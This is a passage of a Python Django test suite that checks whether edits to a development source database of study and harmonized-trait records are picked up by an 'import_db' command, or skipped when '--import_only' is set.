new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_allowed_update_reason(self):
"""Updates to allowed_update_reason are NOT imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.AllowedUpdateReason
model_instance = model.objects.all()[0]
source_db_table_name = 'allowed_update_reason'
field_to_update = 'description'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# There should NOT be any imported updates.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
def test_update_harmonization_unit(self):
"""Updates to harmonization_unit are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizationUnit
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonization_unit'
field_to_update = 'tag'
new_value = 'asdfghjkl'
source_db_pk_name = 'id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_harmonized_trait(self):
"""Updates to harmonized_trait are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTrait
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait'
field_to_update = 'description'
new_value = 'asdfghjkl'
source_db_pk_name = 'harmonized_trait_id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_description'))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_harmonized_trait_encoded_value(self):
"""Updates to harmonized_trait_encoded_values are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTraitEncodedValue
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait_encoded_values'
field_to_update = 'value'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
# M2M link updates.
def test_update_added_harmonized_trait_set_version_update_reasons(self):
"""A new reason link to an existing harmonized_trait_set_version is imported after an update."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick an allowed reason to create a new link to in the source db.
reason = models.AllowedUpdateReason.objects.get(pk=1)
# Find a harmonized_trait_set_version that this reason isn't linked to yet.
linked_hts_versions = reason.harmonizedtraitsetversion_set.all()
possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
if len(unlinked_hts_versions) < 1:
raise ValueError('The allowed update reason is already linked to all possible datasets.')
hts_version_to_link = list(unlinked_hts_versions)[0]
# Create a new hts_version-allowed_reason link in the source db.
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
harmonized_trait_set_version_id, date_added)
VALUES ({}, {}, '{}');""".format(
reason.pk, hts_version_to_link.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_reason_link_query)
self.source_db.commit()
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen reason is now linked to the hts_version that was picked, in the Django db.
reason.refresh_from_db()
hts_version_to_link.refresh_from_db()
self.assertTrue(hts_version_to_link in reason.harmonizedtraitsetversion_set.all())
self.assertTrue(reason in hts_version_to_link.update_reasons.all())
def test_update_removed_harmonized_trait_set_version_update_reasons(self):
"""A harmonized_trait_set_version - reason link that is no longer in the source db is removed after update."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a hts_version to remove the link to in the source db.
hts_version_to_unlink = models.HarmonizedTraitSetVersion.objects.filter(i_version=2).order_by('?').first()
reason_to_unlink = hts_version_to_unlink.update_reasons.all().order_by('?').first()
# Remove the link in the source db.
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
remove_reason_link_query = """DELETE FROM harmonized_trait_set_version_update_reason WHERE
harmonized_trait_set_version_id={} AND
reason_id={}""".format(hts_version_to_unlink.pk, reason_to_unlink.pk)
self.cursor.execute(remove_reason_link_query)
self.source_db.commit()
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen reason is not linked to the hts_version now, in the Django db.
reason_to_unlink.refresh_from_db()
hts_version_to_unlink.refresh_from_db()
self.assertFalse(hts_version_to_unlink in reason_to_unlink.harmonizedtraitsetversion_set.all())
self.assertFalse(reason_to_unlink in hts_version_to_unlink.update_reasons.all())
def test_update_add_component_source_traits(self):
"""A new component source trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[source_trait]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S')
)
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertTrue(htrait_to_link in source_trait.source_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_link in source_trait.source_component_of_harmonization_unit.all())
def test_update_remove_component_source_traits(self):
"""A deleted component source trait link is removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to remove a link to in the source db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_source_traits=None).order_by('?').first()
htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
component_source_trait = hunit_to_unlink.component_source_traits.all().order_by('?').first()
# Open source db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component source trait link.
remove_component_trait_query = """DELETE FROM component_source_trait WHERE harmonized_trait_id={} AND
harmonization_unit_id={} AND component_trait_id={}""".format(
htrait_to_unlink.pk, hunit_to_unlink.pk, component_source_trait.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_source_trait.refresh_from_db()
htrait_to_unlink.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertFalse(htrait_to_unlink in component_source_trait.source_component_of_harmonized_trait.all())
self.assertFalse(hunit_to_unlink in component_source_trait.source_component_of_harmonization_unit.all())
def test_update_add_component_batch_traits(self):
"""A new component batch trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[source_trait]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertTrue(htrait_to_link in source_trait.batch_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_link in source_trait.batch_component_of_harmonization_unit.all())
def test_update_remove_component_batch_traits(self):
"""A deleted component batch trait link is removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a batch trait to remove a link to in the batch db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_batch_traits=None).order_by('?').first()
htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
component_batch_trait = hunit_to_unlink.component_batch_traits.all().order_by('?').first()
# Open batch db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component batch trait link.
remove_component_trait_query = """DELETE FROM component_batch_trait WHERE harmonized_trait_id={} AND
harmonization_unit_id={} AND component_trait_id={}""".format(
htrait_to_unlink.pk, hunit_to_unlink.pk, component_batch_trait.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_batch_trait.refresh_from_db()
htrait_to_unlink.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertFalse(htrait_to_unlink in component_batch_trait.batch_component_of_harmonized_trait.all())
self.assertFalse(hunit_to_unlink in component_batch_trait.batch_component_of_harmonization_unit.all())
def test_update_add_component_age_traits(self):
"""A new component source trait link to an existing harmonized trait is imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to create a new link to in the source db.
source_trait = models.SourceTrait.objects.get(pk=1)
# Find a harmonization_unit which this source trait isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[source_trait]))[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
date_added) values ('{}', '{}', '{}')""".format(
hunit_to_link.i_id, source_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
source_trait.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertTrue(hunit_to_link in source_trait.age_component_of_harmonization_unit.all())
def test_update_remove_component_age_traits(self):
"""A deleted component age trait link is removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to remove a link to in the source db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_age_traits=None).order_by('?').first()
component_age_trait = hunit_to_unlink.component_age_traits.all().order_by('?').first()
# Open source db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component source trait link.
remove_component_trait_query = """DELETE FROM component_age_trait WHERE harmonization_unit_id={} AND
component_trait_id={}""".format(
hunit_to_unlink.pk, component_age_trait.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_age_trait.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertFalse(hunit_to_unlink in component_age_trait.age_component_of_harmonization_unit.all())
def test_update_add_component_harmonized_trait_set_versions(self):
"""New component harmonized trait links to existing harmonized trait and harmonization unit are imported."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a harmonized trait set to create a new link to in the source db.
harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.get(pk=1)
# Find a harmonization_unit which this harmonized trait set isn't linked to already
hunit_to_link = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(
component_harmonized_trait_set_versions__in=[harmonized_trait_set_version]))[0]
# Find a harmonized trait from within this harmonization unit.
htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
# Prep for altering the devel db.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
harmonization_unit_id, component_trait_set_version_id, date_added) values
('{}', '{}', '{}', '{}')""".format(
htrait_to_link.i_trait_id, hunit_to_link.i_id, harmonized_trait_set_version.i_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
last_id = self.cursor.fetchone()['last']
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
harmonized_trait_set_version.refresh_from_db()
htrait_to_link.refresh_from_db()
hunit_to_link.refresh_from_db()
self.assertTrue(htrait_to_link in harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_link in harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
def test_update_remove_component_harmonized_trait_set_versions(self):
"""Deleted component harmonized trait links to a harmonized trait and a harmonization unit are removed."""
# Run the initial db import.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Pick a source trait to remove a link to in the source db.
hunit_to_unlink = models.HarmonizationUnit.objects.exclude(
component_harmonized_trait_set_versions=None).order_by('?').first()
htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
component_harmonized_trait_set_version = hunit_to_unlink.component_harmonized_trait_set_versions.all().order_by('?').first() # noqa: E501
# Open source db with full privileges.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Remove a component source trait link.
remove_component_trait_query = """DELETE FROM component_harmonized_trait_set WHERE harmonized_trait_id={} AND
harmonization_unit_id={} AND component_trait_set_version_id={}""".format(
htrait_to_unlink.pk, hunit_to_unlink.pk, component_harmonized_trait_set_version.pk)
self.cursor.execute(remove_component_trait_query)
self.source_db.commit()
# Close the db connection.
self.cursor.close()
self.source_db.close()
# Now run the update commands.
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Check that the link between these two models is now gone.
component_harmonized_trait_set_version.refresh_from_db()
htrait_to_unlink.refresh_from_db()
hunit_to_unlink.refresh_from_db()
self.assertFalse(
htrait_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
self.assertFalse(
hunit_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
class ImportNoUpdateTest(BaseTestDataTestCase):
"""Tests that updated source data is NOT imported when the --import_only flag is used."""
@classmethod
def setUpClass(cls):
"""Create a user."""
super().setUpClass()
cls.user = UserFactory.create()
# Source trait updates.
def test_no_update_global_study(self):
"""Updates in global_study are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.GlobalStudy
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'global_study'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_study(self):
"""Updates in study are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.Study
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'study'
field_to_update = 'study_name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_source_study_version(self):
"""Updates in source_study_version are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceStudyVersion
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_study_version'
field_to_update = 'is_deprecated'
new_value = int(not getattr(model_instance, 'i_' + field_to_update))
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_source_dataset(self):
"""Updates in source_dataset table are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceDataset
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_dataset'
field_to_update = 'dbgap_description'
new_value = 'asdgsdfg'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_subcohort(self):
"""Updates in subcohort are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.Subcohort
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'subcohort'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_source_trait(self):
"""Updates in source_trait table are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceTrait
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_trait'
field_to_update = 'dbgap_comment'
new_value = 'asdfghjkl'
source_db_pk_name = 'source_trait_id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_source_trait_encoded_value(self):
"""Updates in source_trait_encoded_values are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceTraitEncodedValue
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_trait_encoded_values'
field_to_update = 'value'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
# Harmonized trait updates.
def test_no_update_harmonized_trait_set(self):
"""Updates to harmonized_trait_set are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTraitSet
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait_set'
field_to_update = 'trait_set_name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_harmonized_trait_set_version(self):
"""Updates to harmonized_trait_set_version are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTraitSetVersion
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait_set_version'
field_to_update = 'harmonized_by'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_allowed_update_reason(self):
"""Updates to allowed_update_reason are NOT imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.AllowedUpdateReason
model_instance = model.objects.all()[0]
source_db_table_name = 'allowed_update_reason'
field_to_update = 'description'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# There should NOT be any imported updates.
self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
def test_no_update_harmonization_unit(self):
"""Updates to harmonization_unit are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizationUnit
